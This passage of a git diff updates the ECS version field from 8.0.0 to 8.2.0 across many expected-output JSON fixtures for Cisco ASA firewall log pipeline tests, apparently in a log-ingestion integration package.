"8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2145,7 +2145,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2214,7 +2214,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2284,7 +2284,7 @@ "port": 10051 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2357,7 +2357,7 @@ "port": 10051 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2430,7 +2430,7 @@ "port": 10051 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2503,7 +2503,7 @@ "port": 10051 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2581,7 +2581,7 @@ "port": 39222 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", 
@@ -2653,7 +2653,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2705,7 +2705,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2764,7 +2764,7 @@ "port": 3452 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2840,7 +2840,7 @@ "port": 6007 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2907,7 +2907,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2949,7 +2949,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2998,7 +2998,7 @@ "port": 1985 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3060,7 +3060,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3102,7 +3102,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3151,7 +3151,7 @@ "ip": "10.10.10.10" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3227,7 +3227,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3277,7 +3277,7 @@ "port": 2 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3351,7 +3351,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3420,7 +3420,7 @@ "ip": "10.20.30.40" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3481,7 +3481,7 @@ "ip": "10.20.30.40" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", 
@@ -3542,7 +3542,7 @@ "ip": "10.20.30.40" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3603,7 +3603,7 @@ "ip": "10.20.30.40" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3681,7 +3681,7 @@ "port": 9101 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3772,7 +3772,7 @@ "port": 51635 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3848,7 +3848,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3915,7 +3915,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3966,7 +3966,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4028,7 +4028,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4084,7 +4084,7 @@ "ip": "10.10.1.254" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4151,7 +4151,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4215,7 +4215,7 @@ "ip": "10.10.1.254" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4282,7 +4282,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4340,7 +4340,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4420,7 +4420,7 @@ "ip": "81.2.69.144" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4486,7 +4486,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", 
@@ -4545,7 +4545,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4617,7 +4617,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4680,7 +4680,7 @@ "port": 23 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4762,7 +4762,7 @@ "port": 123123 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "bypass", @@ -4848,7 +4848,7 @@ "port": 514514 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "drop", @@ -4925,7 +4925,7 @@ "port": 123412 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5007,7 +5007,7 @@ "port": 514514 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5088,7 +5088,7 @@ "ip": "192.168.2.2" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "created", @@ -5159,7 +5159,7 @@ "ip": "192.168.2.2" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deleted", @@ -5241,7 +5241,7 @@ "port": 7777 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "connection-started", @@ -5317,7 +5317,7 @@ "port": 7777 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "error", @@ -5387,7 +5387,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5440,7 +5440,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5490,7 +5490,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "error", @@ -5542,7 +5542,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "error", 
@@ -5587,7 +5587,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5629,7 +5629,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "error", @@ -5674,7 +5674,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "error", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-anyconnect-messages.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-anyconnect-messages.log-expected.json index 6ead89a1752..751d6505ee3 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-anyconnect-messages.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-anyconnect-messages.log-expected.json @@ -6,7 +6,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -82,7 +82,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -158,7 +158,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -234,7 +234,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -310,7 +310,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -386,7 +386,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -462,7 +462,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -538,7 +538,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -614,7 +614,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", 
@@ -662,7 +662,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-error", @@ -738,7 +738,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-connected", @@ -814,7 +814,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "client-vpn-disconnected", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json index 3582450637d..763f17b03b4 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -17,7 +17,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -95,7 +95,7 @@ "ip": "10.123.123.123" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -169,7 +169,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -238,7 +238,7 @@ "port": 57621 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -308,7 +308,7 @@ "ip": "10.123.123.123" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -363,7 +363,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -436,7 +436,7 @@ "port": 0 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -505,7 +505,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -574,7 +574,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", 
@@ -644,7 +644,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -731,7 +731,7 @@ "port": 8080 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json index a15d6794774..3735405a9e4 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json @@ -25,7 +25,7 @@ "ip": "67.43.156.12" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -98,7 +98,7 @@ "ip": "67.43.156.12" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -152,7 +152,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -185,7 +185,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -223,7 +223,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json index 78a05215cb2..9fb8ca37bf1 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json @@ -14,7 +14,7 @@ "port": 8256 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -96,7 +96,7 @@ "port": 1772 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", 
@@ -175,7 +175,7 @@ "port": 1758 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -259,7 +259,7 @@ "port": 1757 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -343,7 +343,7 @@ "port": 1755 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -427,7 +427,7 @@ "port": 1754 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -511,7 +511,7 @@ "port": 1752 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -595,7 +595,7 @@ "port": 1749 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -679,7 +679,7 @@ "port": 1750 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -763,7 +763,7 @@ "port": 1747 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -847,7 +847,7 @@ "port": 1742 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -931,7 +931,7 @@ "port": 1741 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1015,7 +1015,7 @@ "port": 1739 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1099,7 +1099,7 @@ "port": 1740 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1183,7 +1183,7 @@ "port": 1738 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1267,7 +1267,7 @@ "port": 1756 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1351,7 +1351,7 @@ "port": 1737 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", 
@@ -1435,7 +1435,7 @@ "port": 1736 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1519,7 +1519,7 @@ "port": 1765 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1602,7 +1602,7 @@ "port": 1188 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1684,7 +1684,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1763,7 +1763,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1850,7 +1850,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1929,7 +1929,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -2011,7 +2011,7 @@ "port": 8257 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2093,7 +2093,7 @@ "port": 1773 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2171,7 +2171,7 @@ "port": 8258 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2253,7 +2253,7 @@ "port": 1774 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2336,7 +2336,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2419,7 +2419,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2498,7 +2498,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -2581,7 +2581,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", 
@@ -2663,7 +2663,7 @@ "port": 8259 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2745,7 +2745,7 @@ "port": 1775 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2823,7 +2823,7 @@ "port": 1189 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2905,7 +2905,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2988,7 +2988,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3067,7 +3067,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3150,7 +3150,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3232,7 +3232,7 @@ "port": 8265 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3314,7 +3314,7 @@ "port": 1452 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3397,7 +3397,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3480,7 +3480,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3559,7 +3559,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3642,7 +3642,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3724,7 +3724,7 @@ "port": 8266 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3806,7 +3806,7 @@ "port": 1453 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", 
@@ -3885,7 +3885,7 @@ "port": 1453 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3973,7 +3973,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4052,7 +4052,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -4135,7 +4135,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -4217,7 +4217,7 @@ "port": 8267 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4299,7 +4299,7 @@ "port": 1454 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4377,7 +4377,7 @@ "port": 8268 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4459,7 +4459,7 @@ "port": 1455 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4537,7 +4537,7 @@ "port": 8269 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4619,7 +4619,7 @@ "port": 1456 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4702,7 +4702,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4781,7 +4781,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -4863,7 +4863,7 @@ "port": 8270 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4945,7 +4945,7 @@ "port": 1457 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5023,7 +5023,7 @@ "port": 8271 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", 
@@ -5105,7 +5105,7 @@ "port": 1458 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5188,7 +5188,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5267,7 +5267,7 @@ "port": 1457 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -5350,7 +5350,7 @@ "port": 8272 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5432,7 +5432,7 @@ "port": 1459 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5511,7 +5511,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -5593,7 +5593,7 @@ "port": 8273 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5675,7 +5675,7 @@ "port": 1460 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5745,7 +5745,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5799,7 +5799,7 @@ "port": 8277 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5881,7 +5881,7 @@ "port": 1385 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5951,7 +5951,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5997,7 +5997,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6043,7 +6043,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6089,7 +6089,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", 
@@ -6135,7 +6135,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -6181,7 +6181,7 @@
 "asa": {}
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -6236,7 +6236,7 @@
 "port": 1382
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -6320,7 +6320,7 @@
 "port": 1385
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -6403,7 +6403,7 @@
 "port": 8278
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -6485,7 +6485,7 @@
 "port": 1386
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -6564,7 +6564,7 @@
 "port": 8277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -6644,7 +6644,7 @@
 "port": 8277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -6724,7 +6724,7 @@
 "port": 8277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -6804,7 +6804,7 @@
 "port": 8277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -6884,7 +6884,7 @@
 "port": 8277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -6964,7 +6964,7 @@
 "port": 8277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -7044,7 +7044,7 @@
 "port": 8277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -7124,7 +7124,7 @@
 "port": 8277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -7204,7 +7204,7 @@
 "port": 8277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -7284,7 +7284,7 @@
 "port": 8277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -7364,7 +7364,7 @@
 "port": 8277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -7444,7 +7444,7 @@
 "port": 8277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -7524,7 +7524,7 @@
 "port": 8277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -7603,7 +7603,7 @@
 "port": 8279
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -7685,7 +7685,7 @@
 "port": 1275
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -7763,7 +7763,7 @@
 "port": 1190
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -7845,7 +7845,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -7924,7 +7924,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -8011,7 +8011,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -8090,7 +8090,7 @@
 "port": 56132
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -8172,7 +8172,7 @@
 "port": 8280
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -8254,7 +8254,7 @@
 "port": 1276
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -8332,7 +8332,7 @@
 "port": 8281
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -8414,7 +8414,7 @@
 "port": 1277
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -8493,7 +8493,7 @@
 "port": 1276
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -8576,7 +8576,7 @@
 "port": 8282
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -8658,7 +8658,7 @@
 "port": 1278
